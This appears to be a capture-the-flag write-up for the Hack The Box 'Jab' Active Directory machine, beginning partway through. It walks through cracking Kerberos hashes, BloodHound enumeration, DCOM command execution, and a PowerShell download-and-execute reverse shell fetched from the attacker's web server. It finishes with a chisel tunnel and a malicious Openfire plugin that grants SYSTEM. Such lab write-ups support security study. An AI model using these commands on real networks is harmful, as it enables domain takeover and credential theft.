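$krb5asrep$23$lbradford@JAB.HTB:2eab39ca95d1aa219363a3bc7dc3f8bd$e6790efcab72b924f59bcea691a8798b
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870ce
$krb5asrep$18$mlowe$JAB.HTB$deadbeef$cafebabe
"""
SAMPLE_LINES = SAMPLE_OUTPUT.splitlines()

if __name__ == "__main__":
    for key, lines in triage(SAMPLE_LINES).items():
        print(key, len(lines))
```

Splitting by mode matters because hashcat rejects a file that mixes formats, and because AES-encrypted replies (etype 17/18) are far slower to crack than RC4; if a domain hands you both, crack the RC4 ones first.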

Cracking the Hash

We run john with rockyou.txt against the hash file and get the password for jmontgomery; the other two hashes do not crack with that wordlist.

 π ~/htb/jab ❯ john hashes.asreproast -wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121     ($krb5asrep$23$jmontgomery@JAB.HTB)
1g 0:00:01:15 DONE (2024-03-18 18:44) 0.01329g/s 190639p/s 525148c/s 525148C/s  0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/jab ❯

This user authenticates over SMB, but the share listing shows nothing beyond the defaults: only IPC$, NETLOGON and SYSVOL are readable.

 π ~/htb/jab ❯ crackmapexec smb 10.10.11.4 -u jmontgomery -p 'Midnight_121' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121
SMB         10.10.11.4      445    DC01             [+] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share
 π ~/htb/jab ❯

We add jmontgomery to Pidgin, connect successfully and list the chat rooms again: a new one appears, pentest2003.

It holds a conversation from a previous pentest showing the use of GetUserSPNs.py (Kerberoasting): the account svc_openfire was found with an SPN, its TGS hash was cracked, and the result was pasted into the chat.

*** 2023-11-21
[13:31:13] <adunn> team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status? 
[13:33:58] <bdavis> sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate. 
[14:30:41] <bdavis> here are the commands from the report, can you find someone from the security team who can re-run these to validate? 
[14:30:43] <bdavis> $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson

Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  ------------  --------  --------------------------  ---------  ----------
http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>

[14:30:56] <bdavis> $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt 

hashcat (v6.1.1) starting...

<SNIP>

$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$<SNIP>:!@#$%^&*(1qazxsw
                                                
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]

Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023

[14:31:57] <adunn> I'll pass this along and circle back with the group 
[14:32:23] <bdavis> perfect, thanks Angela! 
[13:22:55] *** The topic has been set to

svc_openfire - User

Creds

svc_openfire can log in over XMPP and appears to be an administrator there, but enumerating the chat rooms with it turns up nothing useful. We check the account over SMB, WinRM and LDAP: only SMB authenticates. WinRM is refused, and the LDAP check errors out; bloodhound-python below shows why, plain LDAP binds are rejected because the DC enforces LDAP signing, so it falls back to LDAPS.

 π ~/htb/jab ❯ crackmapexec smb 10.10.11.4 -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
 π ~/htb/jab ❯ crackmapexec winrm 10.10.11.4 -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.10.11.4      5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:jab.htb)
HTTP        10.10.11.4      5985   DC01             [*] http://10.10.11.4:5985/wsman
WINRM       10.10.11.4      5985   DC01             [-] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
 π ~/htb/jab ❯ crackmapexec ldap 10.10.11.4 -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.4      445    DC01             [-] jab.htb\svc_openfire:!@#$%^&*(1qazxsw Error connecting to the domain, are you sure LDAP service is running on the target ?

BloodHound

We run bloodhound-python with svc_openfire's credentials, collecting everything and zipping it for import into BloodHound. Note the LDAPS fallback caused by LDAP signing being required.

 π ~/htb/jab ❯ bloodhound-python -u svc_openfire -p '!@#$%^&*(1qazxsw' -d jab.htb -dc dc01.jab.htb -ns 10.10.11.4 -c all --zip
INFO: Found AD domain: jab.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 502 computers
INFO: Connecting to LDAP server: dc01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 2687 users
INFO: Found 162 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: LPTP-0212.jab.htb

[...]

WARNING: Could not resolve: HK-0639.jab.htb: The DNS query name does not exist: HK-0639.jab.htb.
INFO: Done in 00M 38S
INFO: Compressing output into 20240318200527_bloodhound.zip
 π ~/htb/jab ❯

In BloodHound, svc_openfire has an ExecuteDCOM edge to DC01.JAB.HTB. BloodHound draws that edge for members of the local Distributed COM Users group: the account is allowed to instantiate DCOM objects on the DC remotely, which is enough for lateral movement without WinRM.

DCOM

We use impacket's dcomexec to run a ping back to our machine. -nooutput skips the SMB share round-trip dcomexec otherwise uses to fetch command output, and -object MMC20 selects the MMC20.Application object (ExecuteShellCommand) because the default object did not work.

 π ~/htb/jab ❯ impacket-dcomexec -nooutput -object MMC20 -dc-ip 10.10.11.4 -debug 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' "ping 10.10.14.143"
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Target system is 10.10.11.4 and isFQDN is False
[+] StringBinding: DC01[59930]
[+] StringBinding: 10.10.11.4[59930]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.11.4[59930]

 π ~/htb/jab ❯

tcpdump shows the echo requests arriving at our machine, so we have blind command execution as svc_openfire.

 π ~/htb/jab ❯ sudo tcpdump -i tun1 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun1, link-type RAW (Raw IP), snapshot length 262144 bytes
22:37:22.551933 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 60, length 40
22:37:22.551946 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 60, length 40
22:37:23.567997 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 61, length 40
22:37:23.568012 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 61, length 40
22:37:24.572121 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 62, length 40
22:37:24.572136 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 62, length 40
22:37:25.623355 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 63, length 40
22:37:25.623372 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 63, length 40

Shell

We run a nishang reverse shell, fetched from our web server with DownloadString and executed in memory.

 π ~/htb/jab ❯ impacket-dcomexec -nooutput -object MMC20 -dc-ip 10.10.11.4 -debug 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.143/nishang.ps1')"
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Target system is 10.10.11.4 and isFQDN is False
[+] StringBinding: DC01[59966]
[+] StringBinding: 10.10.11.4[59966]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.11.4[59966]

 π ~/htb/jab ❯

After execution we get a shell as svc_openfire and read user.txt.

 π ~/htb/jab ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.143] from jab.htb [10.10.11.4] 59968
Windows PowerShell running as user DC01$ on DC01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32>whoami
jab\svc_openfire
PS C:\windows\system32> dir c:/users/svc_openfire/desktop


    Directory: C:\users\svc_openfire\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/18/2024   8:51 PM             34 user.txt


PS C:\windows\system32> cat c:/users/svc_openfire/desktop/user.txt
69de5daccc4b041743630180d80d175c
PS C:\windows\system32>

Privesc

Earlier we identified Openfire; on the box, its admin console port 9090 is listening, but only on the loopback interface.

PS C:\windows\system32>netstat -ano | findstr 9090
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       1048
PS C:\windows\system32>

Socks Proxy

We use chisel to set up a reverse SOCKS proxy through the box (with R:socks the SOCKS listener opens on the server side, port 1080 by default).

# server - kali (our IP is 10.10.14.143 throughout this writeup)
./chisel server -p 7070 --reverse

# client - box
./chisel.exe client 10.10.14.143:7070 R:socks

In FoxyProxy we add a new entry with the SOCKS proxy settings.

We now reach the Openfire admin console on port 9090 and can log in with svc_openfire's credentials.

CVE-2023-32315

Looking for Openfire vulnerabilities we find CVE-2023-32315, a path traversal that bypasses authentication on the admin console and is chained with a malicious plugin to get remote command execution. Since we already have a valid admin account we do not need the bypass, only the plugin, so we clone the CVE-2023-32315 repository for it.

 π ~/htb/jab ❯ git clone https://github.com/miko550/CVE-2023-32315.git
Cloning into 'CVE-2023-32315'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 31 (delta 15), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (31/31), 38.13 KiB | 6.35 MiB/s, done.
Resolving deltas: 100% (15/15), done.
 π ~/htb/jab ❯ cd CVE-2023-32315
 π CVE-2023-32315 main ❯ ls
CVE-2023-32315.py  openfire-management-tool-plugin.jar  README.md  requirements.txt
 π CVE-2023-32315 main ❯

We upload the jar under Plugins.

The plugin shows up as installed and we open it with the password 123.

It offers several options; the interesting one is "system command", where we run whoami and see that commands execute as SYSTEM, i.e. the Openfire service itself runs as SYSTEM.

Shell

We launch a nishang reverse shell from there, get a shell as SYSTEM and read root.txt.

 π ~/htb/jab ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.143] from jab.htb [10.10.11.4] 60221
Windows PowerShell running as user DC01$ on DC01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files\Openfire\bin>whoami
nt authority\system
PS C:\Program Files\Openfire\bin> cd C:/users/administrator/desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/18/2024   8:51 PM             34 root.txt


PS C:\users\administrator\desktop> cat root.txt
3db06818b977511b73d20d76e85a5550
PS C:\users\administrator\desktop>
Written by sckull (Dany Sucuc), RedTeamer & Pentester wannabe